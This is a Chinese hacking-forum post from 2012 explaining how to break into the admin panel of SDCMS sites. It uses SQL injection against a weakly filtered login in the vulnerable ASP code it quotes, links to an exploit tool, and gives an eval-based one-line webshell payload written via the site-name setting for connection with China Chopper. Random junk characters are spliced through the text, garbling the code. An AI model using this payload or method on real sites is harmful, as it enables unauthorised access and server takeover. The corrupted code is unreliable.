作者:T00LS 鬼哥
* L T+ U2 C1 |, ]& E( J& Y漏洞文件:后台目录/index.asp
( p$ I3 X. K, }, x3 H3 K
. w( R) e+ ~& p+ q$ V( C' m& PSub Check
% d* O; U8 @# ] u5 P- l Dim username,password,code,getcode,Rs' L% @8 {2 d3 Y3 u( a; n0 ^8 z
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub' d- P1 `* i& k1 S& U; ]+ L7 C
username=FilterText(Trim(Request.Form("username")),1)
4 R1 `5 |, {& o% c3 @0 m password=FilterText(Trim(Request.Form("password")),1)4 d$ G# [; \) l& k# m
code=Trim(Request.Form("yzm"))
8 w9 O) l$ x' s3 { getcode=Session("SDCMSCode")# |5 N1 W2 t7 Y5 z# s
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
/ I) q1 D9 ^& M- }. ~ IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
* ~3 V6 v% @; d! i6 A IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied" {) v& ?* P# N# [7 }" e# j
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
! A3 x4 w% e: n1 Z$ f7 }$ o x IF username="" or password="" Then( V! S4 d# \( c7 B3 P
Echo "用户名或密码不能为空"ied$ Z- F$ B/ B) \ ^6 y
Else
% s6 G S5 A" w/ Q# U$ ?: v Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
; {) j* \3 ~& |, `/ k7 ?3 t3 C IF Rs.Eof Then
* G6 Y7 V: E& `. v. U; _ AddLog username,GetIp,"登录失败",1
5 t# K7 }: k2 H5 ?7 } Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
- H8 M/ i4 H5 T w0 O" x6 g Else
3 H& A: u4 f, R/ C* @4 n Add_Cookies "sdcms_id",Rs(0)
+ V: g% ~0 ?9 V, x+ U6 ]1 Z- l3 r Add_Cookies "sdcms_name",username/ L' D+ j! J/ { S9 ]* `
Add_Cookies "sdcms_pwd",Rs(2)' _3 F! s j- J* }! J
Add_Cookies "sdcms_admin",Rs(3)
2 G$ P- B3 G# `, U- G Add_Cookies "sdcms_alllever",Rs(4)
4 w3 }1 |5 G; \5 O! _ Add_Cookies "sdcms_infolever",Rs(5)
! l- m" p" ~1 U4 j9 @ Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")3 f7 ?; u& B6 B9 _+ y5 B1 M) B
AddLog username,GetIp,"登录成功",1# R5 a0 c1 Z5 a" O5 e2 z
'自动删除30天前的Log记录4 R4 W- l% r' Z. E$ b
IF Sdcms_DataType Then
7 s7 h" q9 w8 W7 ~6 s1 l+ ?7 v" d Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
2 X: q6 U* f. f0 q Else) P4 @3 N7 z8 x) L& q$ R
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
, b0 o/ B4 B! y+ ?+ Q End IF9 x* k- e' x T5 m$ a
Go("sdcms_index.asp")) R d2 ^5 |6 i0 H+ g
End IF
: B: X) `; f7 z* d$ u' F Rs.Close
1 c# S7 e' _. i2 o* A5 U, q* O; d Set Rs=Nothing- Q: y2 c* T8 Q% G$ Z; ^3 a8 _
End IF, F* p' t' O/ e" ~
End Sub# l! }, l6 C+ Y/ i/ X( \
3 h6 d5 q/ q2 x$ H0 K’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
# h% b9 G- B* s' I
& n; d+ _% } DFunction FilterText(ByVal t0,ByVal t1) l* F0 A0 a7 e; T& p9 ?8 v O
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function5 N2 c5 V K1 C; O3 }
t0=Trim(t0)/ r( k7 g: h! P$ C4 |! ?6 c
Select Case t1$ c) \7 x9 j# T: F) a8 l1 H
Case "1"
/ E4 A$ r" _( u: Z H3 b( [3 e, k t0=Replace(t0,Chr(32),"")
0 R% a( r" `+ |+ [) e, X1 s# k t0=Replace(t0,Chr(13),"")( N- l# p9 ~7 s# `
t0=Replace(t0,Chr(10)&Chr(10),"")
$ [" Q5 h$ a3 D* M t0=Replace(t0,Chr(10),"")! u/ W5 d. |! A
Case "2"/ \4 O+ b! o. q4 ~: N7 C. J
t0=Replace(t0,Chr(8),"")'回格3 w$ p& T9 l4 U& V _+ q
t0=Replace(t0,Chr(9),"")'tab(水平制表符), b p, `' ?# k. l! H6 C
t0=Replace(t0,Chr(10),"")'换行
6 _; K5 d$ \$ A t0=Replace(t0,Chr(11),"")'tab(垂直制表符); J; Y v+ ^9 f8 ?
t0=Replace(t0,Chr(12),"")'换页4 }+ }. x( l( J& X
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
+ R! p# V3 U$ u3 |. f* t t0=Replace(t0,Chr(22),"")7 Y, C1 [5 Y+ h& n5 [
t0=Replace(t0,Chr(32),"")'空格 SPACE
1 B& {0 H5 Z/ g) i( V, z& L t0=Replace(t0,Chr(33),"")'!1 @- @/ G3 _7 p! Z2 a' w
t0=Replace(t0,Chr(34),"")'") n- j) M/ V" O2 M9 k9 N4 G; B
t0=Replace(t0,Chr(35),"")'#
2 c3 O4 l' H! Y9 @' h t0=Replace(t0,Chr(36),"")'$/ H" `# ^% t. E# h0 B0 ?" A
t0=Replace(t0,Chr(37),"")'%" R* x; v$ O- F( Z) p; i( S
t0=Replace(t0,Chr(38),"")'&
$ Y7 t2 Q' g# Z2 s% P' F t0=Replace(t0,Chr(39),"")''8 h* `' N7 x4 p2 T; h5 [
t0=Replace(t0,Chr(40),"")'(( E+ g8 x9 ^! @, r
t0=Replace(t0,Chr(41),"")')
* q3 u$ x0 Q+ r, l! g8 t t0=Replace(t0,Chr(42),"")'*
; Z, R1 j% m' r1 C$ s1 x3 c t0=Replace(t0,Chr(43),"")'+; a3 f: z1 C% S0 z: M( g
t0=Replace(t0,Chr(44),"")',
' r0 I9 O3 w9 h, F4 B t0=Replace(t0,Chr(45),"")'-1 Y+ j6 G% q7 L7 U
t0=Replace(t0,Chr(46),"")'.* |2 l2 m5 k& M: W4 g6 I
t0=Replace(t0,Chr(47),"")'/
) l4 _# D' \4 J5 D' A$ h3 i t0=Replace(t0,Chr(58),"")':
7 P, n6 o. h6 A% d! E$ P l t0=Replace(t0,Chr(59),"")';
: z8 H( p, j6 B# ~ @ t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>1 O# t0 ~8 M& z) V
t0=Replace(t0,Chr(63),"")'?5 j! ~! e; [. F2 z* e
t0=Replace(t0,Chr(64),"")'@
% d0 y) b- }7 ]/ y5 ~1 s+ [. ?- ` t0=Replace(t0,Chr(91),"")'\
4 w- F; A) Z- } t0=Replace(t0,Chr(92),"")'\
0 j" L) i: p. J/ b t0=Replace(t0,Chr(93),"")']" @" l* \, i- W8 l
t0=Replace(t0,Chr(94),"")'^
( K' o; k. x7 w4 l t0=Replace(t0,Chr(95),"")'_; c- N6 K6 {; ?" m( }3 q1 ^
t0=Replace(t0,Chr(96),"")'`3 w% N' e. m' V9 K7 n' d
t0=Replace(t0,Chr(123),"")'{9 F; m' t* l7 {1 C- @7 n, {. Z
t0=Replace(t0,Chr(124),"")'|
9 j+ A- r+ h5 Q2 r t0=Replace(t0,Chr(125),"")'}" \% h4 ^; f4 f2 W
t0=Replace(t0,Chr(126),"")'~
0 N$ R5 k1 x# Y$ N6 p% t J6 U Case Else
9 X* q0 h$ q* V t0=Replace(t0, "&", "&")8 [: m+ t3 a) {' S1 G
t0=Replace(t0, "'", "'")$ h+ ^. r! T/ P( n+ G
t0=Replace(t0, """", """), H3 D$ `! v: x; g, `
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
8 F4 H8 e; R3 |1 T; s% U4 g End Select4 Z; h. c; v% U, m' A+ |
IF Instr(Lcase(t0),"expression")>0 Then
1 I0 w" M+ _' h; l5 E d4 l4 n1 a! ] t0=Replace(t0,"expression","e­xpression", 1, -1, 0)+ @( B2 ]' f8 B: Z, _0 x3 }5 m
End If
9 W! a! ^! h6 L! c FilterText=t0
/ c+ U# C. z& y# N; b. cEnd Function
Q# ]" U B. Y) O% [1 t5 M) `& X4 ]. t5 t5 n. S" L( Z
看到没。直接参数是1 只过滤5 f c) B6 z* L) I: A" D" F
t0=Replace(t0,Chr(32)," ")
% u! ?* n; r9 Z; ^ t0=Replace(t0,Chr(13),"")' G* D4 a* ~6 S& r5 ^9 q
t0=Replace(t0,Chr(10)&Chr(10),", x+ N, N* X% V: @" e
")9 l) K, L0 [; y8 k3 M7 x
t0=Replace(t0,Chr(10),"
% S- Q \7 \/ P& F")- ]7 _& O$ L4 F
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!' g1 E/ q% i( n5 b5 Z5 b
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
4 K1 J3 [9 j! c# C; J [
9 _+ n6 {9 J7 n5 ?% N0 D1 |$ I& g测试: N0 i& X6 J0 D5 D
, E6 ~0 X. X3 p9 N1 L# g. o( j
% K, U% w3 `/ k" G- Z7 D# o1 B6 Q
现在输入工具上验证码,然后点OK
: ^& }' M8 O8 P! S# U) W. X1 o' u4 \6 [6 `! Z
& S/ h/ S3 y5 L/ o; G
看到我们直接进入后台管理界面了,呵呵!) E; w) f6 u% h, r# I% y
1 `) @5 V) {5 G, t
l" c# g) n) q
! U9 \( T7 Y1 ^9 I这样直接进入后台了。。。。/ a+ x6 {2 y, Y* g0 J8 p# n
8 A9 r* s* U! K9 N$ Y' x! c
- E _. {: d& [5 A0 D" B1 T+ u
# Y' N0 [ o7 Z) }SDCMS提权:
0 h5 K- b+ T6 R- @% _- y2 G% D5 t D0 I: j3 d S
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
/ ~9 ], ~0 o) {. T9 y% v' A; v4 Y2 M3 S3 l" a1 e" _
$ a P+ t4 H% U" U+ c
% M+ x3 E0 p: [5 }+ B" V" M1 a& pOK,现在用菜刀连接下!+ `, U0 y/ l$ e3 e7 |+ o/ e
! H0 N: `; M' T
$ E8 J6 ~. r$ u) Q* X+ I
7 w: ?9 H$ V8 u; \1 Z
1 a7 b+ ]: M; R- Y% U) h; `, u+ i( P
|
发表于 2012-11-9 20:57:02
收藏
支持
反对